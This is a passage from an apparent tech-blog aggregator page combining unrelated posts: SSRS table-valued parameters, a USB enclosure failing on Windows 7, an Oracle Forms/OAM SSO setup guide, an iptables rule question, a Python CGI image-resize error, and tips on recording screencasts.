    @customerIdInserts – This will be a Text parameter that we use to define INSERT statements that will populate the @customerIdList variable that is being declared in the SQL. This parameter won’t actually ever get passed into the stored procedure. I’ll go into how this will work in a bit.
    @startDate – This is a simple date parameter that will get passed through directly into the @startDate parameter of the stored procedure on line 3.
    @endDate – This is another simple date parameter that will get passed through into the @endDate parameter of the stored procedure on line 4.
    At this point the dataset designer will be able to correctly parse the query and should even be able to detect the fields that the stored procedure will return without needing to specify any values for the query when prompted to. Once the dataset has been correctly defined we’ll have a @customerIdInserts parameter listed in the ‘Parameters’ tab of the dataset designer. We need to define an expression for this parameter that will take the values selected by the user for the ‘@customerIds’ parameter that we defined earlier and convert them into INSERT statements that will populate the @customerIdList variable that we defined in our Text query. In order to do this we’ll need to add some custom code to our report using the ‘Report Properties’ dialog. Any custom code defined in the Report Properties dialog gets embedded into the .rdl of the report itself and (unfortunately) must be written in VB .NET.
    Note that you can also add references to custom .NET assemblies (which could be written in any language), but that’s outside the scope of this post so we’ll stick with the “quick and dirty” VB .NET approach for now. Here’s the VB .NET code (note that any embedded code that you add here must be defined in a static/shared function, though you can define as many functions as you want):
    1: Public Shared Function BuildIntegerListInserts(ByVal variableName As String, ByVal paramValues As Object()) As String
    2: Dim insertStatements As New System.Text.StringBuilder()
    3: For Each paramValue As Object In paramValues
    4: insertStatements.AppendLine(String.Format("INSERT {0} VALUES ({1})", variableName, paramValue))
    5: Next
    6: Return insertStatements.ToString()
    7: End Function
    This method takes a variable name and an array of objects. We use an array of objects here because that is how SSRS will pass us the values that were selected by the user at run-time. The method uses a StringBuilder to construct INSERT statements that will insert each value from the object array into the provided variable name. Once this method has been defined in the custom code for the report we can go back into the dataset designer’s Parameters tab and update the expression for the ‘@customerIdInserts’ parameter by clicking on the button with the “function” symbol that appears to the right of the parameter value. We’ll set the expression to:
    1: =Code.BuildIntegerListInserts("@customerIdList ", Parameters!customerIds.Value)
    In order to invoke our custom code method we simply need to invoke “Code.<method name>” and pass in any needed parameters. The first parameter needs to match the name of the IntegerListTableType variable that we used in the EXEC statement of our query. The second parameter will come from the Value property of the ‘@customerIds’ parameter (this evaluates to an object array at run time). Finally, we’ll need to edit the properties of the ‘@customerIdInserts’ parameter on the report to mark it as a nullable internal parameter so that users aren’t prompted to provide a value for it when running the report.
    Limitations And Final Thoughts
    When I first started looking into the text query approach described above I wondered if there might be an upper limit to the size of the string that can be used to run a report. Obviously, the size of the actual query could increase pretty dramatically if you have a parameter that has a lot of potential values or you need to support several different table-valued parameters in the same query. I tested the example Customer Transaction Summary report with 1000 selected customers without any issue, but your mileage may vary depending on how much data you might need to pass into your query. If you think that the text query hack is a lot of work just to use a table-valued parameter, I agree! I think that it should be a lot easier than this to use a table-valued parameter from within SSRS, but so far I haven’t found a better way. It might be possible to create some custom .NET code that could build the EXEC statement for a given set of parameters automatically, but exploring that will have to wait for another post. For now, unless there’s a really compelling reason or requirement to use table-valued parameters from SSRS reports I would probably stick with the tried and true “join-multi-valued-parameter-to-CSV-and-split-in-the-query” approach for using multi-valued parameters in a stored procedure.
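    As a closing illustration, here is roughly what the text query above evaluates to at run time when a user picks three customers. The customer ids (3, 42, 117) and the dates are made up for this example, and the exact date literal format depends on how SSRS converts the date parameters to strings:

    declare @customerIdList IntegerListTableType
    INSERT @customerIdList VALUES (3)
    INSERT @customerIdList VALUES (42)
    INSERT @customerIdList VALUES (117)
    EXEC rpt_CustomerTransactionSummary
        @startDate='2012-01-01',
        @endDate='2012-03-31',
        @customerIds=@customerIdList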


  • External USB attached drive works in Windows XP but not in Windows 7. How to fix?

    - by irrational John
    Earlier this week I purchased this "N52300 EZQuest Pro" external hard drive enclosure from here. I can connect the enclosure using USB 2.0 and access the files in both NTFS partitions on the MBR partitioned drive when I use either Windows XP (SP3) or Mac OS X 10.6. So it works as expected in XP & Snow Leopard. However, the enclosure does not work in Windows 7 (Home Premium), either 64-bit or 32-bit, or in Ubuntu 10.04 (kernel 2.6.32-23-generic). I'm thinking this must be a Windows 7 driver problem because the enclosure works in XP & Snow Leopard. I do know that no special drivers are required to use this enclosure. It is supported using the USB mass storage drivers included with XP and OS X. It should also work fine using the mass storage support in Windows 7, no?
    FWIW, I have also tried using 32-bit Windows 7 on both my desktop, a Gigabyte GA-965P-DS3 with a Pentium Dual-Core E6500 @ 2.93GHz, and on my early 2008 MacBook. I see the same failure in both cases that I see with 64-bit Windows 7. So it doesn't appear to be specific to one hardware platform. I'm hoping someone out there can help me either get the enclosure to work in Windows 7 or convince me that the enclosure hardware is bad and should be RMAed. At the moment though an RMA seems pointless since this appears to be a (Windows 7) device driver problem. I have tried to track down any updates to the mass storage drivers included with Windows 7 but have so far come up empty. Heck, I can't even figure out how to place a bug report with Microsoft since apparently the grace period for Windows 7 email support is only a few months. I came across a link to some USB troubleshooting steps in another question. I haven't had a chance to look over the suggestions on that site or try them yet. Maybe tomorrow if I have time ... ;-)
    I'll finish up with some more details about the problem. When I connect the enclosure using USB to Windows 7, at first it appears that everything worked. Windows detects the drive and installs a driver for it. Looking in Device Manager there is an entry under the Hard Drives section with the title, Hitachi HDT721010SLA360 USB Device. When you open Windows Disk Management the first time after the enclosure has been attached, the drive appears as "Not Initialized" and I'm prompted to initialize it. This is bogus. After all, the drive worked fine in XP so I know it has already been initialized, partitioned, and formatted. So of course I never try to initialize it "again". (It's a 1 TB drive and I don't want to lose the data on it.) Except for this first time, the drive never shows up in Disk Management again unless I uninstall the Hitachi HDT721010SLA360 USB Device entry under Hard Drives, unplug, and then replug the enclosure. If I do that then the process in the previous paragraph repeats.
    In Ubuntu the enclosure never shows up at all at the file system level. Below are an excerpt from kern.log and an excerpt from the result of lsusb -v after attaching the enclosure. It appears that Ubuntu at first recognizes the enclosure and attempts to attach it, but encounters errors which prevent it from doing so. Unfortunately, I don't know whether any of this info is useful or not.
excerpt from kern.log [ 2684.240015] usb 1-2: new high speed USB device using ehci_hcd and address 22 [ 2684.393618] usb 1-2: configuration #1 chosen from 1 choice [ 2684.395399] scsi17 : SCSI emulation for USB Mass Storage devices [ 2684.395570] usb-storage: device found at 22 [ 2684.395572] usb-storage: waiting for device to settle before scanning [ 2689.390412] usb-storage: device scan complete [ 2689.390894] scsi 17:0:0:0: Direct-Access Hitachi HDT721010SLA360 ST6O PQ: 0 ANSI: 4 [ 2689.392237] sd 17:0:0:0: Attached scsi generic sg7 type 0 [ 2689.395269] sd 17:0:0:0: [sde] 1953525168 512-byte logical blocks: (1.00 TB/931 GiB) [ 2689.395632] sd 17:0:0:0: [sde] Write Protect is off [ 2689.395636] sd 17:0:0:0: [sde] Mode Sense: 11 00 00 00 [ 2689.395639] sd 17:0:0:0: [sde] Assuming drive cache: write through [ 2689.412003] sd 17:0:0:0: [sde] Assuming drive cache: write through [ 2689.412009] sde: sde1 sde2 [ 2689.455759] sd 17:0:0:0: [sde] Assuming drive cache: write through [ 2689.455765] sd 17:0:0:0: [sde] Attached SCSI disk [ 2692.620017] usb 1-2: reset high speed USB device using ehci_hcd and address 22 [ 2707.740014] usb 1-2: device descriptor read/64, error -110 [ 2722.970103] usb 1-2: device descriptor read/64, error -110 [ 2723.200027] usb 1-2: reset high speed USB device using ehci_hcd and address 22 [ 2738.320019] usb 1-2: device descriptor read/64, error -110 [ 2753.550024] usb 1-2: device descriptor read/64, error -110 [ 2753.780020] usb 1-2: reset high speed USB device using ehci_hcd and address 22 [ 2758.810147] usb 1-2: device descriptor read/8, error -110 [ 2763.940142] usb 1-2: device descriptor read/8, error -110 [ 2764.170014] usb 1-2: reset high speed USB device using ehci_hcd and address 22 [ 2769.200141] usb 1-2: device descriptor read/8, error -110 [ 2774.330137] usb 1-2: device descriptor read/8, error -110 [ 2774.440069] usb 1-2: USB disconnect, address 22 [ 2774.440503] sd 17:0:0:0: Device offlined - not ready after error recovery [ 2774.590023] usb 1-2: new high speed USB device using ehci_hcd and address 23 [ 2789.710020] usb 1-2: device descriptor read/64, error -110 [ 2804.940020] usb 1-2: device descriptor read/64, error -110 [ 2805.170026] usb 1-2: new high speed USB device using ehci_hcd and address 24 [ 2820.290019] usb 1-2: device descriptor read/64, error -110 [ 2835.520027] usb 1-2: device descriptor read/64, error -110 [ 2835.750018] usb 1-2: new high speed USB device using ehci_hcd and address 25 [ 2840.780085] usb 1-2: device descriptor read/8, error -110 [ 2845.910079] usb 1-2: device descriptor read/8, error -110 [ 2846.140023] usb 1-2: new high speed USB device using ehci_hcd and address 26 [ 2851.170112] usb 1-2: device descriptor read/8, error -110 [ 2856.300077] usb 1-2: device descriptor read/8, error -110 [ 2856.410027] hub 1-0:1.0: unable to enumerate USB device on port 2 [ 2856.730033] usb 3-2: new full speed USB device using uhci_hcd and address 11 [ 2871.850017] usb 3-2: device descriptor read/64, error -110 [ 2887.080014] usb 3-2: device descriptor read/64, error -110 [ 2887.310011] usb 3-2: new full speed USB device using uhci_hcd and address 12 [ 2902.430021] usb 3-2: device descriptor read/64, error -110 [ 2917.660013] usb 3-2: device descriptor read/64, error -110 [ 2917.890016] usb 3-2: new full speed USB device using uhci_hcd and address 13 [ 2922.911623] usb 3-2: device descriptor read/8, error -110 [ 2928.051753] usb 3-2: device descriptor read/8, error -110 [ 2928.280013] usb 3-2: new full speed USB device using uhci_hcd and 
address 14 [ 2933.301876] usb 3-2: device descriptor read/8, error -110 [ 2938.431993] usb 3-2: device descriptor read/8, error -110 [ 2938.540073] hub 3-0:1.0: unable to enumerate USB device on port 2 excerpt from lsusb -v Bus 001 Device 017: ID 0dc4:0000 Macpower Peripherals, Ltd Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 idVendor 0x0dc4 Macpower Peripherals, Ltd idProduct 0x0000 bcdDevice 0.01 iManufacturer 1 EZ QUEST iProduct 2 USB Mass Storage iSerial 3 220417 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 32 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 5 Config0 bmAttributes 0xc0 Self Powered MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 2 bInterfaceClass 8 Mass Storage bInterfaceSubClass 6 SCSI bInterfaceProtocol 80 Bulk (Zip) iInterface 4 Interface0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x01 EP 1 OUT bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Device Qualifier (for other device speed): bLength 10 bDescriptorType 6 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 bNumConfigurations 1 Device Status: 0x0001 Self Powered Update: Results using Firewire to connect. Today I recieved a 1394b 9 pin to 1394a 6 pin cable which allowed me to connect the "EZQuest Pro" via Firewire. Everything works. When I use Firewire I can connect whether I'm using Windows 7 or Ubuntu 10.04. I even tried booting my Gigabyte desktop as an OS X 10.6.3 Hackintosh and it worked there as well. (Though if I recall correctly, it also worked when using USB 2.0 and booting OS X on the desktop. Certainly it works with USB 2.0 and my MacBook.) I believe the firmware on the device is at the latest level available, v1.07. I base this on the excerpt below from the OS X System Profiler which shows Firmware Revision: 0x107. Bottom line: It's nice that the enclosure is actually usable when I connect with Firewire. But I am still searching for an answer as to why it does not work correctly when using USB 2.0 in Windows 7 (and Ubuntu ... but really Windows 7 is my biggest concern). OXFORD IDE Device 1: Manufacturer: EZ QUEST Model: 0x0 GUID: 0x1D202E0220417 Maximum Speed: Up to 800 Mb/sec Connection Speed: Up to 400 Mb/sec Sub-units: OXFORD IDE Device 1 Unit: Unit Software Version: 0x10483 Unit Spec ID: 0x609E Firmware Revision: 0x107 Product Revision Level: ST6O Sub-units: OXFORD IDE Device 1 SBP-LUN: Capacity: 1 TB (1,000,204,886,016 bytes) Removable Media: Yes BSD Name: disk3 Partition Map Type: MBR (Master Boot Record) S.M.A.R.T. status: Not Supported


  • OFM 11g: Implementing OAM SSO with Forms

    - by olaf.heimburger
    There is some confusion about the integration of OFM 11g Forms with Oracle Access Manager 11g (OAM). Some say this does not work, some say it works, but.... Actually, having implemented it many times, I belong to the latter group. Here is how.
    Caveat
    Before you start installing anything, take a step back and consider your current implementation and what you really need and want to achieve. The current integration of Forms 11g with OAM 11g does not support self-service account creation and password resets from the Forms application. If you really need this, you must use the existing Oracle AS 10.1.4.3 infrastructure. On the other hand, if your user population is pretty stable, you can enjoy the latest Forms 11g with OAM 11g.
    Assumptions
    The whole process should be done in one day. I assume that all domains and instances are started during setup; if you need to restart them on demand or on purpose, be sure to have proper start/stop scripts. I do not cover them here.
    Preparation
    It goes without saying that you should always take a proper backup before you change anything in your production environment. By a proper backup, I also mean a tested and verified restore process. If you have not tested it yet, do it now. It pays off.
    Requirements
    For OAM 11g to work properly you need an LDAP repository. For the integration of Forms 11g you need an Oracle Internet Directory (OID) configured with the Oracle AS SSO LDAP extensions. For better support I usually give the latest version a try; in this case OID 11g is a good choice. During the Installation and Integration steps we use an upgrade wizard that needs the old OID configuration on the same host but in a different ORACLE_HOME.
    Installation vs Configuration
    With OFM 11g Oracle introduced a clear separation between Installation of the binaries (the software) and the Configuration of the instances (the runtime). This is really great, as you can install all the software and then create new instances when needed. In the following we adhere to this scheme and install the software first, then configure the instances later.
    Installation Steps
    The Oracle documentation contains all the necessary steps for the installation of all pieces of software, but some hints help to avoid traps and pitfalls.
    Step 1 The Database
    Start the installation with the database. It is quite obvious, but we need an Oracle database for all the other steps. If you have one at hand, fine. If not, just install at least an Oracle 10.2.0.4 version. This database can be on a different host.
    Step 2 The Repository Creation Utility
    The next step should be to run the Repository Creation Utility (RCU). This is a client application that just needs to connect to your database. It can be run on any host that can reach the database and is a Windows or Linux 32-bit machine. When you run it, be sure to install the OID schema and the OAM schema. If you miss one of these, you can run the RCU again to install the missing schema.
    Step 3 The Foundation
    With OFM 11g Oracle started to use WebLogic Server 11g (WLS) as its foundation for all OFM 11g installations. We therefore install it first. Depending on your operating system, it is possible that no native installer is available. My approach to this dilemma is to use the WLS Generic Installer for all my installations. It does not include a JDK either, but if you have both for your platform you are ready to go.
    Step 3a The JDK
    To make things interesting, Oracle currently has two JDKs in its portfolio: the Sun JDK and the JRockit JDK.
    Both are available for a number of platforms. If you are lucky and both are available for your platform, install each in its own directory (and not in one of your ORACLE_HOMEs); you can then use whichever one you like.
    Step 3b Install WLS for OID and OAM
    With the JDK installed, we start the generic installer with java -jar wls_generic.jar. STOP! Before you do this, check the version first. It should be 1.6.0_18 or later and not the GCC one (some Linux distros have it installed by default). To verify the version, issue a java -version command and make sure that the output does not contain the text gcj and that the version matches. If this does not work, use an absolute path like /opt/java/jdk1.6.0_23/bin/java to start the installer. The installer allows you to specify a path to install the software into, say /opt/oracle/iam/11.1.1.3 for the OID and OAM installation. We will call this IAM_HOME.
    Step 4 Install OID
    Now we are ready to install OID. Start the OID installer (in the Disk1 directory) and just select the installation-only step. This will install the software only and does not configure the instance. Use the IAM_HOME as the target directory.
    Step 5 Install SOA Suite
    The IAM 11g Suite uses the BPEL component of the SOA Suite 11g for its workflows. This is a pretty closed environment and not to be used for SCA Composites. We install the SOA Suite in $IAM_HOME/soa. The installer only installs the binaries. Configuration will be done later.
    Step 6 Install OAM
    Once the installation of OID and SOA is done, we are ready to install the OAM software in the same IAM_HOME. Make sure to install the OAM binaries in a directory different from the one you used during the OID and SOA installation. As before, we only install the software; the instance will be created later.
    Step 7 Backup the Installation
    At this point, I normally do a backup (or snapshot in a virtual image) of the installation. It is good to have when you need to go back to this point.
    Step 8 Configure OID
    The software is installed and now we need instances to run it. This process is called configuration. For OID, use the config.sh found in $IAM_HOME/oid/bin to start the configuration wizard. Normally this runs smoothly. If you encounter issues, check the Oracle Support site for help. This configuration will also start the OID instance.
    Step 9 Install the Oracle AS SSO Schema
    Before we install the Forms software we need to install the Oracle AS SSO Schema into the database and OID. This is a rather dangerous procedure, but it is fully documented in the IAM Installation Guide, Chapter 10. You should finish this in one go; do not reboot your host during the whole procedure. As a precaution, make a backup of the OID instance before you start. Once the backup is ready, read the chapter, including every note, carefully. You can avoid a number of issues by following all the steps, and you will end up with a working solution.
    Step 10 Configure OAM
    Reached this step? Great. You are ready to create an OAM instance. Use $IAM_HOME/iam/common/bin/config.sh for this. This will open the WLS Domain Creation Wizard and ask for the libraries to be installed. You should at least select the OAM with Database repository item. The configuration will also start the OAM instance.
    Step 11 Install WLS for Forms 11g
    It is quite tempting to install everything in one ORACLE_HOME. Unfortunately this does not work for all OFM packages, so we do another WLS installation in another ORACLE_HOME. The same considerations as in Step 3b apply.
    We call this one FORMS_HOME.
    Step 12 Install Forms
    In the FORMS_HOME we now install the binaries for the Forms 11g software. Again, this is an install-only step. Configuration starts with the next step.
    Step 13 Configure Forms
    To configure Forms 11g we start the Configuration Wizard (config.sh) in FORMS_HOME/bin. This wizard should create a new WebLogic Domain and an OHS instance! Do not extend existing domains or instances! Forms should run in its own instances! When all information is supplied, the wizard will create the domain and instance and start them automatically.
    Step 14 Setup your Forms SSO Environment
    Once you have implemented and tested your Forms 11g instance, you can configure it for SSO. Yes, this requires the old Oracle AS SSO solution: OIDDAS for creating and assigning users, and SSO to set up your partner applications. In this step you should consider creating every user necessary for use within the environment. When done, do not forget to test it.
    Step 15 Migrate the SSO Repository
    Since the final goal is to get rid of the old SSO implementation, we need to migrate the old SSO repository into the new OID structure. Additionally, this step will also migrate all partner application configurations into OAM 11g. Quite convenient. To do this step, you have to start the upgrade agent (ua, ua.bat or ua.cmd) at the operating system level in $IAM_HOME/bin. Once finished, this wizard will have created new osso.conf files for each partner application in $IAM_HOME/upgrade/temp/oam/. Note: at the time of this writing, this step only works if everything is on the same host (i.e. OID, OAM, etc.). This restriction might be lifted in later releases.
    Step 16 Change your OHS sso.conf and shut down OC4J_SECURITY
    In Step 14 we verified that SSO for our Forms environment works fine. Now we shut the old system down and reconfigure the OHS that acts as the Forms entry point. First we go to the OHS configuration directory and rename the old osso.conf to osso.conf.10g. Then we change moduleconf/mod_osso.conf to point to the new osso.conf file. Copy the new osso.conf file from $IAM_HOME/upgrade/temp/oam/ to the OHS configuration directory. Restart OHS and test Forms by using the same Forms links. OAM should now kick in and show the login dialog asking for your user credentials. Done. Your Forms environment is now successfully integrated with OAM 11g. Enjoy.
    What's Next?
    This rather lengthy setup is just the foundation for your growing environment of OAM 11g protections. In the next entry we will show that Forms 11g and ADF Faces 11g can use the same OAM installation and provide real single sign-on.
    References
    Nearly everything is documented. Use the documentation!
    Oracle® Fusion Middleware Installation Guide for Oracle Identity Management 11gR1
    Oracle® Fusion Middleware Installation Guide for Oracle Identity Management 11gR1, Chapter 11-14
    Oracle® Fusion Middleware Administrator's Guide for Oracle Access Manager 11gR1, Appendix B
    Oracle® Fusion Middleware Upgrade Guide for Oracle Identity Management 11gR1, Chapter 10

    Read the article

  • if I put accept all 0.0.0.0/0 means this server is totally open for any ip ?

    - by davyzhang
    ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 is this means allow all ip from all port? but I still can not visit the server except I go through the allowed ip address and if I put this line in any line, did I make this server totally open for any connection? the full iptable list is below Chain INPUT (policy ACCEPT) target prot opt source destination ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 ACCEPT all -- 116.211.25.89 0.0.0.0/0 ACCEPT all -- 222.215.136.8 0.0.0.0/0 ACCEPT all -- 125.82.87.21 0.0.0.0/0 ACCEPT all -- 127.0.0.1 127.0.0.1 ACCEPT tcp -- 61.172.251.109 0.0.0.0/0 tcp spt:8080 ACCEPT tcp -- 61.172.254.123 0.0.0.0/0 tcp spt:8080 ACCEPT tcp -- 61.129.44.191 0.0.0.0/0 ACCEPT tcp -- 61.129.44.128 0.0.0.0/0 ACCEPT tcp -- 61.172.251.109 0.0.0.0/0 tcp spt:8080 ACCEPT tcp -- 61.172.254.123 0.0.0.0/0 tcp spt:8080 ACCEPT icmp -- 0.0.0.0/0 0.0.0.0/0 icmp type 0 ACCEPT icmp -- 0.0.0.0/0 0.0.0.0/0 icmp type 8 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:53 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:53 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:123 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:123 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:20 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:21 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:80 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:88 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:8000 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:8080 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:8888 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:873 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:6969 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:6900 ACCEPT tcp -- 61.172.241.98 0.0.0.0/0 ACCEPT tcp -- 61.172.247.98 0.0.0.0/0 ACCEPT tcp -- 61.172.247.100 0.0.0.0/0 ACCEPT tcp -- 61.152.122.33 0.0.0.0/0 ACCEPT tcp -- 61.152.110.130 0.0.0.0/0 ACCEPT tcp -- 210.51.28.220 0.0.0.0/0 ACCEPT tcp -- 210.51.28.120 0.0.0.0/0 ACCEPT tcp -- 61.172.241.120 0.0.0.0/0 ACCEPT tcp -- 211.147.0.85 0.0.0.0/0 ACCEPT tcp -- 211.147.0.114 0.0.0.0/0 ACCEPT tcp -- 222.73.61.249 0.0.0.0/0 ACCEPT tcp -- 222.73.61.250 0.0.0.0/0 ACCEPT tcp -- 222.73.61.251 0.0.0.0/0 ACCEPT tcp -- 210.51.31.11 0.0.0.0/0 tcp dpt:38422 ACCEPT tcp -- 210.51.31.12 0.0.0.0/0 tcp dpt:38422 ACCEPT tcp -- 61.172.254.123 0.0.0.0/0 tcp spt:8080 ACCEPT tcp -- 61.172.251.109 0.0.0.0/0 tcp spt:8080 ACCEPT tcp -- 61.172.247.85 0.0.0.0/0 ACCEPT tcp -- 222.73.12.248 0.0.0.0/0 ACCEPT tcp -- 61.172.254.184 0.0.0.0/0 ACCEPT tcp -- 61.172.254.78 0.0.0.0/0 ACCEPT tcp -- 61.172.254.243 0.0.0.0/0 ACCEPT tcp -- 61.152.97.115 0.0.0.0/0 ACCEPT tcp -- 221.231.128.206 0.0.0.0/0 ACCEPT tcp -- 221.231.130.199 0.0.0.0/0 ACCEPT udp -- 172.0.0.0/8 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 10.0.0.0/8 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 192.168.0.0/16 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 61.172.252.58 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 61.183.13.201 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 222.73.2.11 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 221.208.157.158 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 218.30.74.250 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 202.102.54.234 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 125.64.2.115 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 222.73.23.23 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 210.51.33.97 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 210.51.33.98 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 222.73.11.112 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 222.73.11.111 0.0.0.0/0 udp dpt:161 ACCEPT udp -- 222.73.11.89 0.0.0.0/0 udp spt:38514 DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:38423 REJECT tcp -- 0.0.0.0/0 0.0.0.0/0 reject-with tcp-reset DROP all -- 0.0.0.0/0 0.0.0.0/0 Chain FORWARD (policy ACCEPT) target prot opt source destination 
DROP all -- 0.0.0.0/0 0.0.0.0/0 Chain OUTPUT (policy ACCEPT) target prot opt source destination ACCEPT udp -- 0.0.0.0/0 222.73.11.89 udp dpt:38514
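Because the question turns on rule order, a toy model of first-match evaluation may make the reasoning easier to see. This is an illustration only, not the real netfilter engine; the three rules below are lifted and heavily trimmed from the listing above:

    # Toy first-match model of the INPUT chain above (illustration only; the
    # real netfilter engine is far more involved).  Rules are checked top-down
    # and the first match decides the packet's fate, so an unconditional
    # "ACCEPT all 0.0.0.0/0" placed first makes every later DROP or REJECT in
    # the same chain unreachable for inbound traffic.
    import ipaddress

    RULES = [
        # (target, protocol, source network)
        ("ACCEPT", "all", "0.0.0.0/0"),        # the rule the question asks about
        ("ACCEPT", "all", "116.211.25.89/32"),
        ("DROP",   "all", "0.0.0.0/0"),        # the final catch-all DROP
    ]
    POLICY = "ACCEPT"  # chain policy, used only when no rule matches

    def verdict(src_ip, proto="tcp"):
        """Return the fate of a packet under first-match semantics."""
        for target, rule_proto, source in RULES:
            if rule_proto in ("all", proto) and \
               ipaddress.ip_address(src_ip) in ipaddress.ip_network(source):
                return target
        return POLICY

    print(verdict("8.8.8.8"))        # ACCEPT: the first rule matches everything
    print(verdict("116.211.25.89"))  # ACCEPT: never even reaches its own rule

Whether that matches what the poster actually observes depends on details the listing alone cannot settle (other tables, connection tracking, the order the rules were really inserted), so treat the model as a reading aid rather than a diagnosis.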

    Read the article

  • http request to cgi python script successful, but the script doesn't seem to run

    - by chipChocolate.py
    I have configured cgi scripts for my apache2 web server. Here is what I want to do: Client uploads the image to the server. (this already works) On success, I want to execute the python script to resize the image. I tried the following and the success function does execute but my python script does not seem to execute: Javascript code that sends the request: var input = document.getElementById('imageLoader'); imageName = input.value; var file = input.files[0]; if(file != undefined){ formData= new FormData(); console.log(formData.length); if(!!file.type.match(/image.*/)){ formData.append("image", file); $.ajax({ url: "upload.php", type: "POST", processData: false, contentType: false, success: function() { var input = document.getElementById('imageLoader'); imageName = input.value; var file = input.files[0]; formData = new FormData(); formData.append("filename", file); $.ajax({ url: "http://localhost/Main/cgi-bin/resize.py", type: "POST", data: formData, processData: false, contentType: false, success: function(data) { console.log(data); } }); // code continues... resize.py: #!/usr/bin/python import cgi import cgitb import Image cgitb.enable() data = cgi.FieldStorage() filename = data.getvalue("filename") im = Image.open("../JS/upload/" + filename) (width, height) = im.size maxWidth = 600 maxHeight = 400 if width > maxWidth: d = float(width) / maxWidth height = int(height / d) width = maxWidth if height > maxHeight: d = float(height) / maxHeight width = int(width / d) height = maxHeight size = (width, height) im = im.resize(size, Image.ANTIALIAS) im.save("../JS/upload/" + filename, quality=100) This is the apache2.conf: <Directory /var/www/html/Main/cgi-bin> AllowOverride None Options +ExecCGI SetHandler cgi-script AddHandler cgi-script .py .cgi Order allow,deny Allow from all </Directory> cgi-bin and python script file permissions: drwxrwxr-x 2 mou mou 4096 Aug 24 03:28 cgi-bin -rwxrwxrwx 1 mou mou 1673 Aug 24 03:28 resize.py Edit: Executing this code $.ajax({ url: "http://localhost/Main/cgi-bin/resize.py", type: "POST", data: formData, // formData = {"filename" : "the filename which was saved in a variable whie the image was uploaded"} processData: false, contentType: false, success: function(data) { alert(data); } }); it alerts a cgitb-formatted HTML error page (Python 2.7.6, Sun Aug 24 17:24:15 2014). The locals listed on that page show filename = '\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xdb\x00C...' and the plain-text traceback embedded at the bottom of the page reads: Traceback (most recent call last): File "/var/www/html/Main/cgi-bin/resize.py", line 12, in <module> im = Image.open("../JS/upload/" + filename) File "/usr/lib/python2.7/dist-packages/PIL/Image.py", line 1996, in open fp = builtins.open(fp, "rb") TypeError: file() argument 1 must be encoded string without NULL bytes, not str Does this mean that the formData I am sending over is empty?

    Read the article

  • How I Record Screencasts

    - by Daniel Moth
    I get this asked a lot so here is my brain dump on the topic. What A screencast is just a demo that you present to yourself while recording the screen. As such, my advice for clearing your screen for demo purposes and setting up Visual Studio still applies here (adjusting for the fact I wrote those blog posts when I was running Vista and VS2008, not Windows 8 and VS2012). To see examples of screencasts, watch any of my screencasts on channel9. Why If you are a technical presenter, think of when you get best reactions from a developer audience in your sessions: when you are doing demos, of course. Imagine if you could package those alone and share them with folks to watch over and over? If you have ever gone through a tutorial trying to recreate steps to explore a feature, think how much more helpful it would be if you could watch a video and follow along. Think of how many folks you "touch" with a conference presentation, and how many more you can reach with an online shorter recording of the demo. If you invest so much of your time for the first type of activity, isn't the second type of activity also worth an investment? Fact: If you are able to record a screencast of a demo, you will be much better prepared to deliver it in person. In fact lately I will force myself to make a screencast of any demo I need to present live at an upcoming event. It is also a great backup - if for whatever reason something fails (software, network, etc) during an attempt of a live demo, you can just play the recorded video for the live audience. There are other reasons (e.g. internal sharing of the latest implemented feature) but the context above is the one within which I create most of my screencasts. Software & Hardware I use Camtasia from Tech Smith, version 7.1.1. Microsoft has a variety of options for capturing the screen to video, but I have been using this software for so long now that I have not invested time to explore alternatives… I also use whatever cheapo headset is near me, but sometimes I get some complaints from some folks about the audio so now I try to remember to use "the good headset". I do not use a web camera as I am not a huge fan of PIP. Preparation First you have to know your 